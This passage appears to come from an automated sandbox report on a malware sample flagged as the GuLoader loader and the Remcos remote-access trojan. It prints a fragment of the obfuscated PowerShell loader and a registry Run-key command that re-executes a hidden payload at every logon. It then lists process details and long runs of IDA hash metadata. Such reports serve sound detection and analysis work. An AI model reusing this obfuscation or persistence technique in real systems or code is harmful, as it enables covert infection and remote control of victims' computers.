rg$PereSFl pt StarRingeT,ppnSkbngStr eBestkIsraoDi.qr Hete rdnN ale Kap.BlokcTommoTempu UmanDdfdt Cam ') ;$skppeskn=$Strengekorene[$Syningshallerne];}Bussemnd (Sarpedon 'Shal$DespgCorol FodoNonpb AbdaSemilmoda: 
TviCFortoAbsemvi.upS,leoParanModieSupen KirtHi maChecl rav .os=Cory LaroGSlogeOenst Com-MiceCEl.aoBemjn ,nttLefteSt.mnTr.btOrds Ditm$AcoeOStrevEpiceJoggrudstfBereeVensaH,ndrH.idfalaruBetilViabnVindeR,ffscoprs,eka7Fore9 Fle ');Bussemnd (Sarpedon ' Uni$ mycgin slMiniolivebFl ea UnelTand:R.liO VisvIsoleDek.rSocisLnpaeC lln slisUdsgiZo.rbAfs.l.ugmeLdre Coun=Lave Marl[UndeSCreayG.nes ,fstPl.seNglem.lev..oluC .uboSovjn.onivCypre OxirPa,ttSkov]foed:Omsk: garFFordrPillo ThemAphoBOxycaJ,nnsButtePape6card4 .msSTjentEfterForsiCalan AntgWhos(Iagt$ KakCChanoHeuamUntrp Couo Ma nEgnseB.ugn Plat S.raForrl .om)Real ');Bussemnd (Sarpedon 'Invu$ bifg Su,lPar,oTritbparaaVejblAn e:GodtNcurioSkamnThi,d GeniJulelUnsiaEcontFrenaStrkbMattlOut e Hor Skor= Skj Dite[FornSThioyhiersDi.it lite Aurmford.Did TLayseDelixP.ritTomo. CorECon.n.lencPlotoFuncdPyrgi Fl nI.eagA.ti]Kryd:Star: lokABoobSParsCMo,eI Ly,IOpt,.PedeGRuthepanct StiSAurotPublr AmbiNonbnIch g Bef(Chyl$.andOSkyfvFrijePinkr .jes DiaeLouvn omps.amoi,houbDe tl B teIsoc)Genu ');Bussemnd (Sarpedon ' Pen$Provg.laylImproLibebTryka s rlInte:Cen DSkovaAscacoutftUbesy UnplAnaloMaimn EksovermmR,styLavi2Lu.r0Deni4Gul,=Stop$UredNMakaoGor.nK.lidRo.tiSy tlSo.aaNonitE,teaReprb NonlParaeN.bl.De isi.dau DiabStibsB.llt manr N,ni He nSureg Nem(Takk2 sti8Absa0Vire4,ami5Equi6Forl, Boo2 L.p7 The2 Kli2skgl5 .ag)Frui ');Bussemnd $Dactylonomy204;"
                                            Imagebase:0x690000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2491604213.0000000008650000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2491964679.00000000099BB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:true

                                            Target ID:6
                                            Start time:16:05:11
                                            Start date:20/04/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"
                                            Imagebase:0x1c0000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:10
                                            Start time:16:05:28
                                            Start date:20/04/2024
                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                            Imagebase:0xfa0000
                                            File size:516'608 bytes
                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:false

                                            Target ID:11
                                            Start time:16:05:36
                                            Start date:20/04/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"
                                            Imagebase:0x1c0000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:12
                                            Start time:16:05:36
                                            Start date:20/04/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:13
                                            Start time:16:05:36
                                            Start date:20/04/2024
                                            Path:C:\Windows\SysWOW64\reg.exe
                                            Wow64 process (32bit):true
                                            Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"
                                            Imagebase:0x1d0000
                                            File size:59'392 bytes
                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 267d07f8d14adedded17958cc2027e81b4e9bd37bdd2bf01d653ab85c67191d9
                                              • Instruction ID: 28aba65caa350ca4048051c43a9bf32f2eba05aba05fa1c015fc3dde3f79e7af
                                              • Opcode Fuzzy Hash: 267d07f8d14adedded17958cc2027e81b4e9bd37bdd2bf01d653ab85c67191d9
                                              • Instruction Fuzzy Hash: 72B14F70E002099FDB14CFA9DC957EEBBF2AF48714F148529D855E7364EB74A882CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: h]_k$I_k
                                              • API String ID: 0-3564571517
                                              • Opcode ID: 6d1949c5ddfe07f255940180644c5b09bb9f9dfed44b2375e658f1fe99d18e5f
                                              • Instruction ID: 7124cceb26bff17c7620059df9ee566ceeda23ea360164b312a372ce1950bd38
                                              • Opcode Fuzzy Hash: 6d1949c5ddfe07f255940180644c5b09bb9f9dfed44b2375e658f1fe99d18e5f
                                              • Instruction Fuzzy Hash: 5C315E30B042288FCB269B34C8506EEB7B6AF89308F0004EDD509AB351DF359E86CF95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V_k
                                              • API String ID: 0-804111439
                                              • Opcode ID: 43539c090b14d4ad8c7a94a4777367e952f78131dc0cc5fd525bc0350c90f3ab
                                              • Instruction ID: ae5db70eb45c227f74efc00028ba2cde70924b5b87df3e80c8932bb2d942812b
                                              • Opcode Fuzzy Hash: 43539c090b14d4ad8c7a94a4777367e952f78131dc0cc5fd525bc0350c90f3ab
                                              • Instruction Fuzzy Hash: D6B16B71E00209DFDB14CFA9C8857DDBBF1AF58714F148129E895E7364EB74A881CB85
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: de0749473d8c9ad727fbd47cb7fc517cf6023c6bd157c442de3a7068f661c9e3
                                              • Instruction ID: 0ac169a681a16a9d596629ec8865fcefb5a7139d8b3829a89360c887c57b65a5
                                              • Opcode Fuzzy Hash: de0749473d8c9ad727fbd47cb7fc517cf6023c6bd157c442de3a7068f661c9e3
                                              • Instruction Fuzzy Hash: 71628174A00215DFDB24DF58C854BAABBB6AF84710F14C469D509AF785CB71EC82CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ab81fa2930aa0820715194b7a365a1ae89c42f48672162bb23ca54b24c7cad9e
                                              • Instruction ID: f45d981eedc7beb172a6af8200150197e6cbf32c9c2c136b0077b638cca6300e
                                              • Opcode Fuzzy Hash: ab81fa2930aa0820715194b7a365a1ae89c42f48672162bb23ca54b24c7cad9e
                                              • Instruction Fuzzy Hash: 98624A74B00208DFDB14CB98C544AAEBBB6AF84714F25C069E909AF795CB72EC46CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 56a919a09b29ca714a40198944a1c3ab98d5091f26049f2f4b39b169d2988445
                                              • Instruction ID: 896c61e2a246daeadf115ec81c88a0ed5bcaba8855d9b66b607fe228931d544f
                                              • Opcode Fuzzy Hash: 56a919a09b29ca714a40198944a1c3ab98d5091f26049f2f4b39b169d2988445
                                              • Instruction Fuzzy Hash: 1B625E74A00219DFDB24DB64C854BEEBBB2AF85740F1081E9D509AB791CB71EE81CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 181f90a1c98a0ccdde7eedb20f03470b0c3afad69d998fe17cdf53183c6bbb97
                                              • Instruction ID: 9e790fee7b9f0ba3f5c5a2aad2ef27ab607184908970c9149fa8f1e497025a15
                                              • Opcode Fuzzy Hash: 181f90a1c98a0ccdde7eedb20f03470b0c3afad69d998fe17cdf53183c6bbb97
                                              • Instruction Fuzzy Hash: 55322B78B00204DFDB14CB98C544EA9BBB6AF84724F15C069E909AF395CB72EC86CF55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9f7e799d1f4914f71477ba5479c5cab57273061bc682c580be0d9040b8c1cdc4
                                              • Instruction ID: 7ddda8ed0f90945d6363d6a1943a9b8db1ae9f2522b126071aed43cf52bec640
                                              • Opcode Fuzzy Hash: 9f7e799d1f4914f71477ba5479c5cab57273061bc682c580be0d9040b8c1cdc4
                                              • Instruction Fuzzy Hash: F8122C78B00204EFDB14CB98C544EA9B7B6AF84724F15C069E909AF395DB72EC46CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c0c4e75294c9341275d6ad651e43f751a1947b1a94ce4f1d4af2046c2a496bac
                                              • Instruction ID: 6e7828a6cad77256950fe103e73f76a41378d0cfefaf0b70f180601289833fef
                                              • Opcode Fuzzy Hash: c0c4e75294c9341275d6ad651e43f751a1947b1a94ce4f1d4af2046c2a496bac
                                              • Instruction Fuzzy Hash: F402AD74B00214DFDB14DBA8C854BAEBBE6AFC4714F14C469EA05AB795CB32EC41CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a6ccd93538e005b6348ee7a9e81eea63890608ee4b7edf5627a335b46f448aaa
                                              • Instruction ID: e4e31481293e6a0a06f738252fbaa6f0318a89e9aa281b1641fc96503630a61a
                                              • Opcode Fuzzy Hash: a6ccd93538e005b6348ee7a9e81eea63890608ee4b7edf5627a335b46f448aaa
                                              • Instruction Fuzzy Hash: 18E1E435B04255DFDB258B74C4186AABBAAAF86310F14C4FBD545CB2D2EB31EC41C7A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bc5759c16afe9760a8a966ea533e3319c96c4ce240c051de15b8d31935a3bd83
                                              • Instruction ID: 18a8a01f8d7bb4898ec1a0f288d22dd262019caacb7ae14ff7245af65523b638
                                              • Opcode Fuzzy Hash: bc5759c16afe9760a8a966ea533e3319c96c4ce240c051de15b8d31935a3bd83
                                              • Instruction Fuzzy Hash: 4D024C74A00265DFDB24DB64C954BAEBBB2AF85340F10C1E5DA09AB791CB71AEC1CF41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 56cfd97f9a92967a6741157d4a496da134ab16d3bd798131e2c1b3d270fd22ad
                                              • Instruction ID: ac5a4c3603b5605a8da44858189f266caff934a001eae5cebfcb1f56cc227958
                                              • Opcode Fuzzy Hash: 56cfd97f9a92967a6741157d4a496da134ab16d3bd798131e2c1b3d270fd22ad
                                              • Instruction Fuzzy Hash: DAF15F74A00215DFEB24DB58C850FAABAB7AFC4740F10C0A9D509AB796CB71ED818F55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 011a8c44f232b2d7ce5e8de3348c890b11e33709c2c3900c0875856556d7759e
                                              • Instruction ID: 1aa31fb94e4a703b3410a4ec2f6b815096c5cf8a54c452f574ffc1b22213ff51
                                              • Opcode Fuzzy Hash: 011a8c44f232b2d7ce5e8de3348c890b11e33709c2c3900c0875856556d7759e
                                              • Instruction Fuzzy Hash: 29E16075B00204DFDF14CBA8C454AAABBF6AFC8314F14C86AE905AB795DB71EC41CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a78ff54057113aa443ea7b4f4f60bde8d8bedcfdbb2f552d0b2a7263cf5c5ebe
                                              • Instruction ID: 505a733497fb40000e933335e0300c4848940946f89d35ebe4e43adae512fb8f
                                              • Opcode Fuzzy Hash: a78ff54057113aa443ea7b4f4f60bde8d8bedcfdbb2f552d0b2a7263cf5c5ebe
                                              • Instruction Fuzzy Hash: D4E15F74A00255DFDB14DB68CC54BAEBBA3AFC5740F1084A9D609AF391CB71EE818F91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cdd1dbbed553d524806fda088b7a69c718d2fb35a8c7a7554e623adecd58c8fe
                                              • Instruction ID: e3d6e3ca5df7304332e2ce998a06135668bebeeee76d0e7af13b4bd9c9234435
                                              • Opcode Fuzzy Hash: cdd1dbbed553d524806fda088b7a69c718d2fb35a8c7a7554e623adecd58c8fe
                                              • Instruction Fuzzy Hash: 66D16C74A00205DFDB18DBA8C454BAEBBB2AFC4710F20C469E5056F395CF75E841CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: df783f0b77d3d6167cd973fe18264e35e8224cfde0a88e02e2a3aeb3b8f1b80a
                                              • Instruction ID: 671ce72451fcc8516abfda86ff408512bb38bb3235aaab669e4d6bd8ef633959
                                              • Opcode Fuzzy Hash: df783f0b77d3d6167cd973fe18264e35e8224cfde0a88e02e2a3aeb3b8f1b80a
                                              • Instruction Fuzzy Hash: 06B12C35B04255CFEB248B68E8447BABBAAAFC1310F14C17BD5059B6D1DB32E841C7A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 90d60de54865dee1bbf332cf1e5bcc5ece6f21925a4014dd77572a4c9da9bc29
                                              • Instruction ID: 176d4c1b878ed5344a8e02321bc9db3bfd7c414654fc0c5ae5a2c2ef53aa9c73
                                              • Opcode Fuzzy Hash: 90d60de54865dee1bbf332cf1e5bcc5ece6f21925a4014dd77572a4c9da9bc29
                                              • Instruction Fuzzy Hash: 86D1F674A01249EFDB05CFA8D484A9DFBB2EF48310F258559E854AB351E731ED82CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f2a88afe0ca033e60560a41c0a233abb3476b4939cdbf4e87bdea06bab7e6b3
                                              • Instruction ID: 634499ef2a5d39f07a66a01360f14ed91d94d6f455233d9795966660df8514a9
                                              • Opcode Fuzzy Hash: 6f2a88afe0ca033e60560a41c0a233abb3476b4939cdbf4e87bdea06bab7e6b3
                                              • Instruction Fuzzy Hash: 68B16C74A00204DFDB14DF98C454BAEBBB2AF88710F25C4A9E9056F396CB75F846CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9c57d7f3fd905b3b13c62d627fd65614e651503318b614bfa2ac25ccea18eff7
                                              • Instruction ID: d2e7ab4c6bb38b8f471224e85cbd44dec923caeb212d792624cf32c7f8b64c00
                                              • Opcode Fuzzy Hash: 9c57d7f3fd905b3b13c62d627fd65614e651503318b614bfa2ac25ccea18eff7
                                              • Instruction Fuzzy Hash: A8B15A70E002099FDB14CFA9DC957EEBBF1AF48714F148529E854E7364EB74A886CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f687767782c7eee6efd259a36fa14e395274af81b78c681ead077807126e3877
                                              • Instruction ID: 412e01b4475cffd8861a8003906c9d0cfb2469d08d25b607202ff1860fe0b3ed
                                              • Opcode Fuzzy Hash: f687767782c7eee6efd259a36fa14e395274af81b78c681ead077807126e3877
                                              • Instruction Fuzzy Hash: 96A18E71A00248DFDB14EFA4D944AEDBBB6FF84304F118559E946AB354EB34AD89CF80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ba824cd38c28e9839c56a978e5af6492a14b39b3484ad7e67a62aecd2fdeae6a
                                              • Instruction ID: 7a3647a23061fc0acb93865a29cd09581968ccae4c84135071cfe2ce90263131
                                              • Opcode Fuzzy Hash: ba824cd38c28e9839c56a978e5af6492a14b39b3484ad7e67a62aecd2fdeae6a
                                              • Instruction Fuzzy Hash: FC91BE30A002449FC725EF68D8449EDBBF6BF89314F1485A9D4859B762DB35EC86CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a4ce56ce6ac54496f3ca3ff9369294123aeb641376a8baf19eb703f7af81fc44
                                              • Instruction ID: 2d938b836bbf5a714840739f2d8224a1360a52ffd4db3ea016b3503ef856aeed
                                              • Opcode Fuzzy Hash: a4ce56ce6ac54496f3ca3ff9369294123aeb641376a8baf19eb703f7af81fc44
                                              • Instruction Fuzzy Hash: 9361C27060A385DFC7228B64C854A65BFB6AF87210B19C0EBD584CF2D3D771AC46C792
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4908bbffab21b23de9ff735b6eca1ba15e5c78a81a2bc62733107e1ac17aa645
                                              • Instruction ID: 3bf72b1491951caa53446f1e59175cd7b94ffe5d281dfc3c9e100f91988944a5
                                              • Opcode Fuzzy Hash: 4908bbffab21b23de9ff735b6eca1ba15e5c78a81a2bc62733107e1ac17aa645
                                              • Instruction Fuzzy Hash: BE812BB4A00204DFDF14CF58C594AA9BBB6EF88314F15C869E904AB795DB32EC81CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480323193.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_2cbd000_powershell.jbxd
